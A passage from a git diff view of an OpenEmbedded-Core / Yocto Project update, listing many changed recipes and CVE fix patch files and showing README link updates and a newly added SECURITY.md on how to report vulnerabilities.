-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch214
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch60
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb14
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb4
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb1
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch33
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb19
-rw-r--r--meta/recipes-multimedia/lame/lame_3.100.bb3
-rw-r--r--meta/recipes-multimedia/liba52/liba52_0.7.4.bb3
-rw-r--r--meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch21
-rw-r--r--meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb1
-rw-r--r--meta/recipes-multimedia/libpng/files/run-ptest29
-rw-r--r--meta/recipes-multimedia/libpng/libpng_1.6.37.bb18
-rw-r--r--meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch13
-rw-r--r--meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb2
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch36
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch44
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch30
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch46
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb9
-rw-r--r--meta/recipes-multimedia/libtiff/files/0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch52
-rw-r--r--meta/recipes-multimedia/libtiff/files/001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch148
-rw-r--r--meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch27
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch119
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch55
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch42
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch36
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch39
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch217
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch34
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0909.patch37
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-0924.patch58
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch183
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch159
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-34526.patch29
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3570_3598.patch659
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch123
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch277
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-3970.patch45
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-40090.patch548
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2022-48281.patch26
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-0795_0796_0797_0798_0799.patch157
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-0800_0801_0802_0803_0804.patch135
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-1916.patch91
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-25433.patch173
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch90
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch35
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch33
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch59
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch35
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch47
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch34
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch67
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch53
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch30
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch191
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch152
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch46
-rw-r--r--meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch94
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch28
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch212
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch62
-rw-r--r--meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch30
-rw-r--r--meta/recipes-multimedia/libtiff/tiff_4.1.0.bb53
-rw-r--r--meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb6
-rw-r--r--meta/recipes-multimedia/pulseaudio/pulseaudio.inc2
-rw-r--r--meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch30
-rw-r--r--meta/recipes-multimedia/speex/speex_1.2.0.bb4
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-1999.patch55
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch366
-rw-r--r--meta/recipes-multimedia/webp/files/CVE-2023-4863-0002.patch53
-rw-r--r--meta/recipes-multimedia/webp/libwebp_1.1.0.bb6
-rw-r--r--meta/recipes-multimedia/x264/x264_git.bb2
-rw-r--r--meta/recipes-rt/rt-tests/rt-tests.inc2
-rw-r--r--meta/recipes-rt/rt-tests/rt-tests_1.1.bb3
-rw-r--r--meta/recipes-sato/images/core-image-sato-dev.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato-ptest-fast.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato-sdk-ptest.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato-sdk.bb1
-rw-r--r--meta/recipes-sato/images/core-image-sato.bb2
-rw-r--r--meta/recipes-sato/l3afpad/l3afpad_git.bb6
-rw-r--r--meta/recipes-sato/matchbox-config-gtk/matchbox-config-gtk_0.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.2.bb3
-rw-r--r--meta/recipes-sato/matchbox-keyboard/matchbox-keyboard_0.1.1.bb1
-rw-r--r--meta/recipes-sato/matchbox-panel-2/matchbox-panel-2_2.11.bb4
-rw-r--r--meta/recipes-sato/matchbox-terminal/matchbox-terminal_0.2.bb2
-rw-r--r--meta/recipes-sato/matchbox-theme-sato/matchbox-theme-sato_0.2.bb2
-rw-r--r--meta/recipes-sato/packagegroups/packagegroup-core-x11-sato.bb2
-rw-r--r--meta/recipes-sato/pcmanfm/pcmanfm_1.3.1.bb1
-rw-r--r--meta/recipes-sato/puzzles/puzzles_git.bb3
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode.inc1
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode/0001-libev-remove-deprecated-throw-specification.patch30
-rw-r--r--meta/recipes-sato/rxvt-unicode/rxvt-unicode_9.22.bb4
-rw-r--r--meta/recipes-sato/sato-screenshot/sato-screenshot_0.3.bb2
-rw-r--r--meta/recipes-sato/settings-daemon/settings-daemon_0.0.2.bb2
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/0001-MiniBrowser-Fix-reproduciblity.patch31
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/0001-clang-11-fix-build-errors-due-to-WWc-11-narrowing.patch66
-rw-r--r--meta/recipes-sato/webkit/webkitgtk/CVE-2020-13753.patch15
-rw-r--r--meta/recipes-sato/webkit/webkitgtk_2.28.4.bb (renamed from meta/recipes-sato/webkit/webkitgtk_2.28.2.bb)6
-rw-r--r--meta/recipes-support/apr/apr-util/0001-Fix-error-handling-in-gdbm.patch135
-rw-r--r--meta/recipes-support/apr/apr-util_1.6.3.bb (renamed from meta/recipes-support/apr/apr-util_1.6.1.bb)8
-rw-r--r--meta/recipes-support/apr/apr/0001-Add-option-to-disable-timed-dependant-tests.patch20
-rw-r--r--meta/recipes-support/apr/apr/0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch58
-rw-r--r--meta/recipes-support/apr/apr/0002-apr-Remove-workdir-path-references-from-installed-ap.patch25
-rw-r--r--meta/recipes-support/apr/apr/0003-Makefile.in-configure.in-support-cross-compiling.patch63
-rw-r--r--meta/recipes-support/apr/apr/0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch76
-rw-r--r--meta/recipes-support/apr/apr/libtoolize_check.patch21
-rw-r--r--meta/recipes-support/apr/apr_1.7.2.bb (renamed from meta/recipes-support/apr/apr_1.7.0.bb)31
-rw-r--r--meta/recipes-support/argp-standalone/argp-standalone_1.3.bb1
-rw-r--r--meta/recipes-support/aspell/aspell_0.60.8.bb17
-rw-r--r--meta/recipes-support/aspell/files/CVE-2019-25051.patch101
-rw-r--r--meta/recipes-support/atk/at-spi2-atk_2.34.1.bb2
-rw-r--r--meta/recipes-support/atk/at-spi2-core_2.34.0.bb6
-rw-r--r--meta/recipes-support/atk/atk_2.34.1.bb1
-rw-r--r--meta/recipes-support/attr/acl_2.2.53.bb5
-rw-r--r--meta/recipes-support/attr/attr.inc6
-rw-r--r--meta/recipes-support/bash-completion/bash-completion_2.10.bb7
-rw-r--r--meta/recipes-support/bmap-tools/bmap-tools_3.5.bb2
-rw-r--r--meta/recipes-support/boost/boost-1.72.0.inc2
-rw-r--r--meta/recipes-support/boost/boost.inc6
-rw-r--r--meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch32
-rw-r--r--meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch24
-rw-r--r--meta/recipes-support/boost/boost_1.72.0.bb2
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch80
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch20
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch34
-rw-r--r--meta/recipes-support/ca-certificates/ca-certificates_20211016.bb (renamed from meta/recipes-support/ca-certificates/ca-certificates_20210119.bb)13
-rw-r--r--meta/recipes-support/consolekit/consolekit_0.4.6.bb2
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22876.patch59
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22890.patch464
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22898.patch26
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22924.patch226
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22925.patch43
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch86
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22946.patch328
-rw-r--r--meta/recipes-support/curl/curl/CVE-2021-22947.patch352
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-22576.patch148
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-1.patch45
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-2.patch80
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-3.patch83
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27774-4.patch35
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27775.patch39
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27776.patch114
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27781.patch46
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27782-1.patch363
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-27782-2.patch71
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32206.patch52
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32207.patch284
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32208.patch72
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-32221.patch29
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-35252.patch72
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-35260.patch68
-rw-r--r--meta/recipes-support/curl/curl/CVE-2022-43552.patch82
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-23916.patch231
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27533.patch59
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch51
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27534.patch33
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch236
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27535.patch170
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27536.patch55
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-27538.patch31
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch197
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28320.patch86
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28321.patch272
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-28322.patch380
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-32001.patch38
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-38545.patch148
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-38546.patch132
-rw-r--r--meta/recipes-support/curl/curl/CVE-2023-46218.patch52
-rw-r--r--meta/recipes-support/curl/curl/CVE-2024-2398.patch88
-rw-r--r--meta/recipes-support/curl/curl_7.69.1.bb55
-rw-r--r--meta/recipes-support/db/db_5.3.28.bb3
-rw-r--r--meta/recipes-support/debianutils/debianutils_4.9.1.bb5
-rw-r--r--meta/recipes-support/diffoscope/diffoscope_172.bb (renamed from meta/recipes-support/diffoscope/diffoscope_136.bb)11
-rw-r--r--meta/recipes-support/dos2unix/dos2unix_7.4.1.bb2
-rw-r--r--meta/recipes-support/enchant/enchant2_2.2.8.bb3
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch50
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch31
-rw-r--r--meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch30
-rw-r--r--meta/recipes-support/fribidi/fribidi_1.0.9.bb9
-rw-r--r--meta/recipes-support/gdbm/gdbm_1.18.1.bb3
-rw-r--r--meta/recipes-support/gmp/gmp/cve-2021-43618.patch27
-rw-r--r--meta/recipes-support/gmp/gmp_6.2.0.bb1
-rw-r--r--meta/recipes-support/gnome-desktop-testing/gnome-desktop-testing_2018.1.bb6
-rw-r--r--meta/recipes-support/gnupg/gnupg/0001-configure.ac-use-a-custom-value-for-the-location-of-.patch6
-rw-r--r--meta/recipes-support/gnupg/gnupg/0003-dirmngr-uses-libgpg-error.patch24
-rw-r--r--meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch44
-rw-r--r--meta/recipes-support/gnupg/gnupg/relocate.patch20
-rw-r--r--meta/recipes-support/gnupg/gnupg_2.2.27.bb (renamed from meta/recipes-support/gnupg/gnupg_2.2.20.bb)10
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch67
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch65
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch37
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch282
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch85
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch206
-rw-r--r--meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch125
-rw-r--r--meta/recipes-support/gnutls/gnutls_3.6.14.bb11
-rw-r--r--meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch45
-rw-r--r--meta/recipes-support/gnutls/libtasn1_4.16.0.bb3
-rw-r--r--meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch24
-rw-r--r--meta/recipes-support/gpgme/gpgme_1.13.1.bb3
-rw-r--r--meta/recipes-support/iso-codes/iso-codes_4.4.bb5
-rw-r--r--meta/recipes-support/itstool/itstool_2.0.6.bb4
-rw-r--r--meta/recipes-support/libassuan/libassuan_2.5.3.bb3
-rw-r--r--meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb1
-rw-r--r--meta/recipes-support/libbsd/libbsd_0.10.0.bb6
-rw-r--r--meta/recipes-support/libcap/files/CVE-2023-2602.patch52
-rw-r--r--meta/recipes-support/libcap/files/CVE-2023-2603.patch58
-rw-r--r--meta/recipes-support/libcap/libcap_2.32.bb8
-rw-r--r--meta/recipes-support/libcheck/libcheck_0.14.0.bb5
-rw-r--r--meta/recipes-support/libcroco/libcroco_0.6.13.bb3
-rw-r--r--meta/recipes-support/libdaemon/libdaemon_0.14.bb4
-rw-r--r--meta/recipes-support/libevdev/libevdev/determinism.patch3
-rw-r--r--meta/recipes-support/libevdev/libevdev_1.8.0.bb3
-rw-r--r--meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch33
-rw-r--r--meta/recipes-support/libevent/libevent_2.1.11.bb6
-rw-r--r--meta/recipes-support/libexif/libexif_0.6.22.bb3
-rw-r--r--meta/recipes-support/libfm/libfm-extra_1.3.1.bb1
-rw-r--r--meta/recipes-support/libfm/libfm_1.3.1.bb2
-rw-r--r--meta/recipes-support/libgcrypt/files/CVE-2021-33560.patch77
-rw-r--r--meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch109
-rw-r--r--meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb5
-rw-r--r--meta/recipes-support/libgpg-error/libgpg-error_1.37.bb1
-rw-r--r--meta/recipes-support/libical/libical_3.0.7.bb4
-rw-r--r--meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb2
-rw-r--r--meta/recipes-support/libksba/libksba/CVE-2022-3515.patch47
-rw-r--r--meta/recipes-support/libksba/libksba/CVE-2022-47629.patch69
-rw-r--r--meta/recipes-support/libksba/libksba_1.3.5.bb10
-rw-r--r--meta/recipes-support/libnl/libnl_3.5.0.bb5
-rw-r--r--meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch41
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch30
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch59
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch660
-rw-r--r--meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch74
-rw-r--r--meta/recipes-support/libpcre/libpcre2_10.34.bb6
-rw-r--r--meta/recipes-support/libpcre/libpcre_8.44.bb3
-rw-r--r--meta/recipes-support/libproxy/libproxy_0.4.15.bb4
-rw-r--r--meta/recipes-support/libpsl/libpsl_0.21.0.bb13
-rw-r--r--meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb4
-rw-r--r--meta/recipes-support/libunistring/libunistring_0.9.10.bb1
-rw-r--r--meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch420
-rw-r--r--meta/recipes-support/libunwind/libunwind_1.3.1.bb1
-rw-r--r--meta/recipes-support/liburcu/liburcu_0.11.1.bb3
-rw-r--r--meta/recipes-support/libusb/libusb1_1.0.22.bb6
-rw-r--r--meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch201
-rw-r--r--meta/recipes-support/libxslt/libxslt_1.1.34.bb10
-rw-r--r--meta/recipes-support/lz4/files/CVE-2021-3520.patch27
-rw-r--r--meta/recipes-support/lz4/lz4_1.9.2.bb10
-rw-r--r--meta/recipes-support/lzo/lzo_2.10.bb4
-rw-r--r--meta/recipes-support/lzop/lzop_1.04.bb1
-rw-r--r--meta/recipes-support/mpfr/mpfr_4.0.2.bb1
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch215
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-2.patch53
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-3.patch122
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-4.patch48
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-5.patch53
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_1.patch277
-rw-r--r--meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-3580_2.patch163
-rw-r--r--meta/recipes-support/nettle/nettle_3.5.1.bb8
-rw-r--r--meta/recipes-support/npth/npth_1.6.bb1
-rw-r--r--meta/recipes-support/p11-kit/p11-kit_0.23.22.bb4
-rw-r--r--meta/recipes-support/popt/popt_1.16.bb1
-rw-r--r--meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb4
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch347
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch243
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch156
-rw-r--r--meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch166
-rw-r--r--meta/recipes-support/re2c/re2c_1.0.1.bb10
-rw-r--r--meta/recipes-support/rng-tools/rng-tools/rngd.service1
-rw-r--r--meta/recipes-support/rng-tools/rng-tools_6.9.bb2
-rw-r--r--meta/recipes-support/serf/serf_1.3.9.bb5
-rw-r--r--meta/recipes-support/shared-mime-info/shared-mime-info_git.bb3
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2020-35525.patch21
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2020-35527.patch22
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2021-20223.patch23
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2022-35737.patch29
-rw-r--r--meta/recipes-support/sqlite/files/CVE-2023-7104.patch46
-rw-r--r--meta/recipes-support/sqlite/sqlite3.inc1
-rw-r--r--meta/recipes-support/sqlite/sqlite3_3.31.1.bb5
-rw-r--r--meta/recipes-support/taglib/taglib_1.11.1.bb1
-rw-r--r--meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch13
-rw-r--r--meta/recipes-support/vim/files/disable_acl_header_check.patch15
-rw-r--r--meta/recipes-support/vim/files/no-path-adjust.patch8
-rw-r--r--meta/recipes-support/vim/files/racefix.patch33
-rw-r--r--meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch13
-rw-r--r--meta/recipes-support/vim/vim-tiny_9.0.bb (renamed from meta/recipes-support/vim/vim-tiny_8.2.bb)0
-rw-r--r--meta/recipes-support/vim/vim.inc48
-rw-r--r--meta/recipes-support/vim/vim_9.0.bb (renamed from meta/recipes-support/vim/vim_8.2.bb)0
-rw-r--r--meta/recipes-support/vte/vte_0.58.3.bb2
-rwxr-xr-xscripts/bitbake-whatchanged2
-rwxr-xr-xscripts/buildhistory-diff5
-rwxr-xr-xscripts/contrib/build-perf-test-wrapper.sh15
-rwxr-xr-xscripts/contrib/convert-srcuri.py77
-rwxr-xr-xscripts/contrib/documentation-audit.sh2
-rwxr-xr-xscripts/contrib/oe-build-perf-report-email.py167
-rwxr-xr-xscripts/create-pull-request2
-rwxr-xr-xscripts/git26
-rw-r--r--scripts/lib/buildstats.py4
-rw-r--r--scripts/lib/checklayer/__init__.py11
-rw-r--r--scripts/lib/checklayer/cases/common.py2
-rw-r--r--scripts/lib/devtool/deploy.py12
-rw-r--r--scripts/lib/devtool/menuconfig.py2
-rw-r--r--scripts/lib/devtool/standard.py9
-rw-r--r--scripts/lib/recipetool/create.py18
-rw-r--r--scripts/lib/resulttool/report.py5
-rw-r--r--scripts/lib/resulttool/resultutils.py8
-rw-r--r--scripts/lib/scriptutils.py10
-rw-r--r--scripts/lib/wic/engine.py6
-rw-r--r--scripts/lib/wic/help.py4
-rw-r--r--scripts/lib/wic/misc.py17
-rw-r--r--scripts/lib/wic/partition.py40
-rw-r--r--scripts/lib/wic/pluginbase.py8
-rw-r--r--scripts/lib/wic/plugins/imager/direct.py2
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-efi.py7
-rw-r--r--scripts/lib/wic/plugins/source/bootimg-pcbios.py6
-rwxr-xr-xscripts/nativesdk-intercept/chgrp27
-rwxr-xr-xscripts/nativesdk-intercept/chown27
-rwxr-xr-xscripts/oe-depends-dot21
-rwxr-xr-xscripts/oe-pkgdata-browser2
-rwxr-xr-xscripts/oe-setup-builddir4
-rw-r--r--scripts/pybootchartgui/pybootchartgui/draw.py7
-rw-r--r--scripts/pybootchartgui/pybootchartgui/parsing.py2
-rwxr-xr-xscripts/relocate_sdk.py10
-rwxr-xr-xscripts/runqemu55
-rwxr-xr-xscripts/verify-bashisms2
-rwxr-xr-xscripts/wic6
-rwxr-xr-xscripts/yocto-check-layer28
1704 files changed, 120966 insertions, 7558 deletions
diff --git a/README.OE-Core b/README.OE-Core
index 521916cd4f..2f2127fb03 100644
--- a/README.OE-Core
+++ b/README.OE-Core
@@ -6,24 +6,24 @@ of OpenEmbedded. It is distro-less (can build a functional image with
6DISTRO = "nodistro") and contains only emulated machine support. 6DISTRO = "nodistro") and contains only emulated machine support.
7 7
8For information about OpenEmbedded, see the OpenEmbedded website: 8For information about OpenEmbedded, see the OpenEmbedded website:
9 http://www.openembedded.org/ 9 https://www.openembedded.org/
10 10
11The Yocto Project has extensive documentation about OE including a reference manual 11The Yocto Project has extensive documentation about OE including a reference manual
12which can be found at: 12which can be found at:
13 http://yoctoproject.org/documentation 13 https://docs.yoctoproject.org/
14 14
15 15
16Contributing 16Contributing
17------------ 17------------
18 18
19Please refer to 19Please refer to
20http://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded 20https://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded
21for guidelines on how to submit patches. 21for guidelines on how to submit patches.
22 22
23Mailing list: 23Mailing list:
24 24
25 http://lists.openembedded.org/mailman/listinfo/openembedded-core 25 https://lists.openembedded.org/g/openembedded-core
26 26
27Source code: 27Source code:
28 28
29 http://git.openembedded.org/openembedded-core/ 29 https://git.openembedded.org/openembedded-core/
diff --git a/SECURITY.md b/SECURITY.md
new file mode 100644
index 0000000000..7d2ce1f631
--- /dev/null
+++ b/SECURITY.md
@@ -0,0 +1,24 @@
1How to Report a Potential Vulnerability?
2========================================
3
4If you would like to report a public issue (for example, one with a released
5CVE number), please report it using the
6[https://bugzilla.yoctoproject.org/enter_bug.cgi?product=Security Security Bugzilla].
7If you have a patch ready, submit it following the same procedure as any other
8patch as described in README.md.
9
10If you are dealing with a not-yet released or urgent issue, please send a
11message to security AT yoctoproject DOT org, including as many details as
12possible: the layer or software module affected, the recipe and its version,
13and any example code, if available.
14
15Branches maintained with security fixes
16---------------------------------------
17
18See [https://wiki.yoctoproject.org/wiki/Stable_Release_and_LTS Stable release and LTS]
19for detailed info regarding the policies and maintenance of Stable branches.
20
21The [https://wiki.yoctoproject.org/wiki/Releases Release page] contains a list of all
22releases of the Yocto Project. Versions in grey are no longer actively maintained with
23security patches, but well-tested patches may still be accepted for them for
24significant issues.
diff --git a/bitbake/SECURITY.md b/bitbake/SECURITY.md
new file mode 100644
index 0000000000..7d2ce1f631
--- /dev/null
+++ b/bitbake/SECURITY.md
@@ -0,0 +1,24 @@
1How to Report a Potential Vulnerability?
2========================================
3
4If you would like to report a public issue (for example, one with a released
5CVE number), please report it using the
6[https://bugzilla.yoctoproject.org/enter_bug.cgi?product=Security Security Bugzilla].
7If you have a patch ready, submit it following the same procedure as any other
8patch as described in README.md.
9
10If you are dealing with a not-yet released or urgent issue, please send a
11message to security AT yoctoproject DOT org, including as many details as
12possible: the layer or software module affected, the recipe and its version,
13and any example code, if available.
14
15Branches maintained with security fixes
16---------------------------------------
17
18See [https://wiki.yoctoproject.org/wiki/Stable_Release_and_LTS Stable release and LTS]
19for detailed info regarding the policies and maintenance of Stable branches.
20
21The [https://wiki.yoctoproject.org/wiki/Releases Release page] contains a list of all
22releases of the Yocto Project. Versions in grey are no longer actively maintained with
23security patches, but well-tested patches may still be accepted for them for
24significant issues.
diff --git a/bitbake/bin/bitbake-getvar b/bitbake/bin/bitbake-getvar
new file mode 100755
index 0000000000..9423219253
--- /dev/null
+++ b/bitbake/bin/bitbake-getvar
